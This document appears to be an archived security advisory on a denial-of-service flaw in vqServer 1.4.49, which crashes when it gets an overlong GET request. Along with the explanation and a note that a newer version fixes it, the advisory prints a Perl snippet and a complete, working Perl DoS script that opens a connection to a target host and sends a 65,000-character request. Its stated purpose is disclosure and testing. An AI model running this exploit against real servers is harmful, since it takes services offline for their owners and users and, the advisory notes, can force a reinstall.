vqServer version 1.4.49 is vulnerable to a denial of service attack by sending a malformed URL request. Tested on Windows version. The latest edition of vqServer (1.9.47) is unaffected.
50488cee02fca807a8ce6e2060e9884bc802b907abd649fbdd372b9c7f8b7faeDHC Advisory
Advisory for vqServer 1.4.49
vqServer is made by vqSoft. Site: http://www.vqsoft.com
by nemesystm of the DHC
(http://dhcorp.cjb.net - auto45040@hushmail.com)
/-|=[explaination]=|-\
When sending vqServer version 1.4.49 a malformed URL request it will crash
the service. This has been verified to work on the Windows version, but
it probably is in the linux/unix version and prior versions too.
/-|=[testing it]=|-\
To test this vulnerability, send a GET request with 65000 characters.
So:
GET /AAA (hit return =)
Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste
that much characters in their browser fields (www.server.com/AAA) you will
have to use something like Telnet.
You can easily program something to print 65000 chars in Perl:
open (OUT, ">$ARGV[0]");
print OUT ("GET /");
print OUT ("A" x 65000);
then it's just a cut and paste.
Or you can use the example code below
/-|=[fix]=|-\
the latest edition of vqServer (1.9.47) is unaffected by this. It is available
for download at www.vqsoft.com
/-|=[notes]=|-\
PUT, POST and the Administration port do not seem to be affected by a high
amount of characters. The Windows version needed a reinstall every five
or so crashes. A reboot or total shutdown did not help.
/-|=[exploit code]=|-\
sinfony quickly wrote some code so you can see if you're vulnerable.
#!/usr/bin/perl
# DoS exploit for vqServer 1.4.49
# This vulnerability was discovered by nemesystm
# (auto45040@hushmail.com)
#
# code by: sinfony (chinesef00d@hotmail.com)
# [confess.sins.labs] (http://www.ro0t.nu/csl)
# and DHC member
#
# kiddie quote of the year:
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it
die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
usage: $0 <host> \n"
if $#ARGV != 0;
use IO::Socket;
$host = $ARGV[0];
$port = 80;
print "Connecting to $host on port $port...\n";
$suck = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "$host isnt a webserver you schmuck.\n";
$a = A;
$send = $a x 65000;
print "Connected, sending exploit.\n";
print $suck "GET /$send\n";
sleep(3);
print "Exploit sent. vqServer should be dead.\n";
close($suck)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed